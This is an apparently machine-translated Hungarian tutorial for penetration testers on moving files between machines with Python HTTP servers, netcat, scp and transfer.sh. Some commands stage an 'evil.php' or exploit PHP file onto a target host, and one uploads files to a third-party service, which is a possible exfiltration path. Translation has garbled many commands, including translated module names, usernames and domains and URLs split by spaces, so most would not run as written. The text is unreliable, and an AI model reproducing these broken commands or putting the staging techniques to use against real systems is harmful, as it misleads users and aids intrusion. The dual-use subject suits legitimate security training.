Kihasználások, python szkriptek és modulok betöltése gyakran szükséges a penetrációs tesztelési tevékenységek során. Mivel a terminál az eszköz, amelyet többnyire használnak, elengedhetetlen a fájlátvitel alapjainak megértéséhez.
A toll tesztelőnek különféle trükkökkel kell rendelkeznie a fájlok távoli szerverről és egyik könyvtárból a másikba történő átviteléhez. Ebben az oktatóanyagban a fájlok átvitelének különböző módjait tárgyaljuk meg a parancssor segítségével.
1. Python szerver
A Python az alapcsomag, amelyet szinte az összes Debian-alapú rendszer előre telepít. Fájlok egyik gépről a másikra való átviteléhez tegye a következőket:
Python2:
Váltson át arra a könyvtárra, ahol az átvinni kívánt fájl létezik. Indítson el egy egyszerű python szervert. Írja be a következő parancsot;
$ python -m SimpleHTTPServer 8080
Most menjen ahhoz a géphez, ahová át szeretné vinni a fájlt. A fájl letöltéséhez használja a következő parancsot;
$ wget http: // 192.168.43.177: 8080 / fájl
Ne felejtse el kicserélni a fájl IP-jét, portszámát és nevét.
Python3:
Bármi, amit python2-ben írtak, szinte mindig megszakad a python3-ban. Tehát azt is megvizsgáljuk, hogyan lehet egy fájlt átvinni a python3 segítségével.
Python3 esetén írja be a következő parancsot egy egyszerű python kiszolgáló elindításához.
$ python3 -m http.szerver 8080
A fájl célba történő letöltéséhez írja be a következő parancsot;
$ wget http: // 192.168.43.177: 8080 / kihasználni.php
2. Netcat
A Netcat egy hatékony segédprogram fájlok átviteléhez bármely távoli gépről egy helyi gépre. Lehet, hogy nem mindig van telepítve. Megadásával ellenőrizheti, hogy létezik-e vagy sem;
$ melyik netcat
Alternatív megoldásként beírással;$ amely nc
Készítsen egy netcat szervert a következő paranccsal;
$ nc -nlvp 8080 < evil.php
Most lépjen a célgéphez, és írja be a következőket a fájl letöltéséhez;
$ nc -nv 192.168.43.177 8080> gonosz.php
Cserélje ki nc
val vel netcat
a fenti parancsokban, ha az nc nem működik, vagy nincs megfelelően telepítve.
3. SCP
A Secure Copy Protocol egy hatékony eszköz fájlok átviteléhez. Különösen akkor hasznos, ha könyvtárakat akar átvinni. Leginkább az ssh-n keresztüli fájlátvitelre is használják.
Ha az fájlt ssh-n keresztül szeretné továbbítani, írja be a következő parancsot a küldő gépre;
$ scp -i új.pem teszt.py ubuntu @ 18.220.68.229: / home / ubuntu
Ahol -i az ssh bejelentkezés nyilvános kulcsát jelenti, teszt.py az átvinni kívánt fájl, a / home / ubuntu pedig a célkönyvtár, ahová a fájlt el akarjuk menteni.
Fájl letöltéséhez a távoli gépről írja be a következő parancsot;
$ scp gyökér @ 192.168.43.177: / távoli könyvtár / fájl / helyi / könyvtár
4. Átruházás.SH
Ezzel a harmadik féltől származó eszközzel fájlokat továbbíthat. Hasznos lehet, ha nincs nyilvános IP-vel rendelkező gépe, és továbbra is át kell töltenie a fájlokat. A következő parancs feltölti a fájlt az átvitelre.sh szerverek;
$ curl --upload-file ./ fájl.txt https: // átvitel.sh / fájl.txt
A fájl letöltéséhez írja be a következő parancsot;
$ curl https: // transzfer.sh // fájl.txt -o fájl.txt
Átruházás.sh még fejlesztés alatt áll, és nem biztos, hogy mindig működik.
Következtetés
A parancssori eszközök lehetővé teszik a fájlok különböző módon történő továbbítását. Lehet, hogy kissé bonyolultnak tűnnek, de a kezükbe adás lehetővé teszi a fájlok egyszerű kezelését, különösen, ha nem áll rendelkezésre GUI opció.